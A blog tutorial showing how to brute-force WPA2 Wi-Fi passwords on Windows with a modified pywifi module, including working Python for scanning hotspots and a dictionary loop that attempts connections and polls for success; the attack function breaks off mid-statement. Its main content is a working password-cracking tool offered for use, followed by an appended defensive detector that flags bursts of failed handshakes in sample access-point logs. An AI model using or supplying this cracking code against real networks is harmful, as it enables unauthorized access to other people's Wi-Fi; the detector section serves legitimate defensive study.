Using Python as a hacker to brutally crack wifi password

Keywords: Python network Programming Windows

The first few articles mainly introduced using Delphi to develop backdoors and a simple remote-control tool. Some readers said Delphi is out of date and nobody uses it any more, but I think a programming language is just a way to implement functionality: use whichever language you are familiar with or like.

DELPHI hacker programming (1): implementing the forward backdoor principle
DELPHI hacker programming (2): implementing the reverse (rebound) backdoor principle
DELPHI hacker programming (3): implementing the simple remote control principle

During recent project development at the company I came across some Python and WiFi knowledge, and I want to share what I have learned. Also note: whether you are learning Python for employment or as a hobby, remember that project development experience is always the core.

0x0001 development environment:

Windows 10 + Python 2.7.15

0x0002 development objective:

Develop a dictionary-based tool that tries to crack a WiFi hotspot password.

While developing this tool, the author found some projects on the Internet, but they all target Linux and cannot be used directly on Windows, so he decided to adapt them, combined with the Linux projects found, so that they run on Windows.
The starting point was the article "a very easy to understand WIFI password explosion python script" (https://my.oschina.net/Apathy/blog/821039). That article uses the pywifi module and notes: "this module is a bit weak under win. The author did not package the WLAN 'security' attributes when calling the WLAN API, so it is recommended to run under linux. Kali 2.0 comes with python 2.7.6, which can be installed directly through pip install pywifi." However, the author found that it can still run on Windows. Because the module's source code needs to be modified, the module is not installed with pip; instead its source is copied directly into the project directory.

0x0003 module modification:

When running the test case shipped with the module, print produced a lot of useless output, so the "show my need info" print call on line 335 of wifiutil_win.py was removed.

0x0004 program execution process

The functional requirements are clear, so the steps are as follows:
1. Get local wireless card information
2. Scan for nearby WiFi hotspots
3. Try to connect to a hotspot using the dictionary
4. Output the scan results

Follow the above process to write code.

0x0005 code implementation

Getting wireless network interface information

After importing the module, its interface functions are used to obtain the local wireless card information. The code is encapsulated as follows:

```python
# Python 2.7 (the module's source is copied into the project directory)
import time
from pywifi import PyWiFi, Profile, const

def get_wifi_interface():
    wifi = PyWiFi()
    # No wireless card at all: nothing to do
    if len(wifi.interfaces()) <= 0:
        print u'Wireless card interface not found!'
        exit()
    # Exactly one card: use it without asking
    if len(wifi.interfaces()) == 1:
        print u'Wireless card interface: %s'%(wifi.interfaces()[0].name())
        return wifi.interfaces()[0]
    else:
        # Several cards: list them and let the user pick one by index
        print '%-4s   %s'%(u'Serial number',u'Network card interface name')
        for i,w in enumerate(wifi.interfaces()):
            print '%-4s   %s'%(i,w.name())
        while True:
            # Prompt is re-encoded to GBK for the Windows console
            iface_no = raw_input('Please select network card interface serial number:'.decode('utf-8').encode('gbk'))
            no = int(iface_no)
            if no>=0 and no < len(wifi.interfaces()):
                return wifi.interfaces()[no]
```

Scanning nearby hotspots

The scan results are obtained through the scan function, encapsulated as follows. The sleep(2) is there because, during testing, the local wireless card needed some time before it returned results; if your card performs well you can remove it:

```python
def scan(face):
    face.scan()
    # Give the card time to finish the scan before reading results
    time.sleep(2)
    return face.scan_results()
```

Trying to connect (cracking the password)

To try a password, first define a Profile, pass it to connect, and then poll the status function for the connection result. If the status is const.IFACE_CONNECTED the connection succeeded and the result is displayed; any other value means failure.

```python
def test(i,face,x,key,stu,ts):
    # Show the BSSID when the SSID is empty, hidden or implausibly long
    showID = x.bssid if len(x.ssid)==0 or x.ssid=='\\x00' or len(x.ssid)>len(x.bssid) else x.ssid
    key_index = 0
    while key_index < len(key):
        k = key[key_index]
        x.key = k.strip()
        # Start from a clean profile list for every attempt
        face.remove_all_network_profiles()
        profile = Profile()
        profile.ssid = x.ssid
        profile.auth = const.AUTH_ALG_OPEN
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        profile.cipher = const.CIPHER_TYPE_CCMP
        profile.key = x.key
        face.connect(face.add_network_profile(profile))
        code = -1
        t1 = time.time()
        now = time.time() - t1
        # Poll the connection status until it settles or the timeout ts expires
        while True:
            time.sleep(0.1)
            code = face.status()
            now = time.time()-t1
            if now>ts:
                break
            stu.write("\r%-6s| %-18s| %5.2fs | %-6s %-15s | %-12s"%(i,showID,now,len(key)-key_index,k.strip(),get_iface_status(code)))
            stu.flush()
            if code == const.IFACE_DISCONNECTED :
                break
            elif code == const.IFACE_CONNECTED:
                face.disconnect()
                stu.write("\r%-6s| %-18s| %5.2fs | %-6s %-15s | %-12s\n"%(
```
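Seen from the access point, the loop above produces a burst of association attempts from one station MAC, each ending in a failed WPA2 4-way handshake, followed (if a dictionary word matches) by a successful one. The following detector, added here as an example and not part of the original post or of pywifi, runs over constructed, illustrative AP log lines (the message wording and the `STA <mac>` layout are assumptions, not a real hostapd format) and flags any station with `threshold` or more handshake failures inside a sliding window, plus a success that follows such a burst:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (illustrative format, not a real AP's output).
# Station ...:01 fails six times in 10 s and then succeeds; ...:02 is a
# normal client with one mistyped passphrase; the AP-ENABLED line is noise.
SAMPLE_LOG = """\
2020-04-29T20:48:00 wlan0: AP-ENABLED
2020-04-29T20:49:01 wlan0: STA aa:bb:cc:dd:ee:01 WPA: 4-way handshake failed
2020-04-29T20:49:03 wlan0: STA aa:bb:cc:dd:ee:01 WPA: 4-way handshake failed
2020-04-29T20:49:05 wlan0: STA aa:bb:cc:dd:ee:01 WPA: 4-way handshake failed
2020-04-29T20:49:07 wlan0: STA aa:bb:cc:dd:ee:01 WPA: 4-way handshake failed
2020-04-29T20:49:09 wlan0: STA aa:bb:cc:dd:ee:01 WPA: 4-way handshake failed
2020-04-29T20:49:11 wlan0: STA aa:bb:cc:dd:ee:01 WPA: 4-way handshake failed
2020-04-29T20:49:13 wlan0: STA aa:bb:cc:dd:ee:01 WPA: 4-way handshake completed
2020-04-29T20:50:00 wlan0: STA aa:bb:cc:dd:ee:02 WPA: 4-way handshake failed
2020-04-29T20:50:02 wlan0: STA aa:bb:cc:dd:ee:02 WPA: 4-way handshake completed
"""

# Assumed line layout: "<ISO timestamp> <iface>: STA <mac> <message>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<iface>\S+): STA (?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}) (?P<msg>.+)$'
)


def parse_line(line):
    """Return a dict for a station event line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        'ts': datetime.strptime(m.group('ts'), '%Y-%m-%dT%H:%M:%S'),
        'iface': m.group('iface'),
        'mac': m.group('mac').lower(),
        'msg': m.group('msg'),
    }


def detect_handshake_bursts(lines, window_seconds=60, threshold=5):
    """Flag stations with >= threshold handshake failures within the window,
    and any successful handshake from a station that was already flagged."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # mac -> timestamps of recent failures
    alerted = set()               # macs that already raised a burst alert
    alerts = []
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue              # non-station lines are ignored
        mac, msg = ev['mac'], ev['msg'].lower()
        if 'handshake failed' in msg:
            q = recent[mac]
            q.append(ev['ts'])
            # Drop failures that fell out of the sliding window
            while q and ev['ts'] - q[0] > window:
                q.popleft()
            if len(q) >= threshold and mac not in alerted:
                alerted.add(mac)
                alerts.append({'kind': 'handshake_burst', 'mac': mac,
                               'count': len(q), 'first': q[0], 'last': ev['ts']})
        elif 'handshake completed' in msg and mac in alerted:
            # A success right after a burst is the case worth escalating
            alerts.append({'kind': 'success_after_burst', 'mac': mac,
                           'count': len(recent[mac]),
                           'first': recent[mac][0], 'last': ev['ts']})
    return alerts


if __name__ == '__main__':
    for a in detect_handshake_bursts(SAMPLE_LOG.splitlines()):
        print('%-20s %s failures=%d %s..%s' % (a['kind'], a['mac'], a['count'],
                                                a['first'].time(), a['last'].time()))
```

The window and threshold are tuned to the attack shape rather than to a single event: one or two failures per station are ordinary typos, while five inside a minute from the same MAC is the signature of sequential guessing, and a completed handshake immediately after such a burst is the event to escalate and respond to (rotate the passphrase, review the client list).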

Posted by QbertsBrother on Wed, 29 Apr 2020 20:49:33 -0700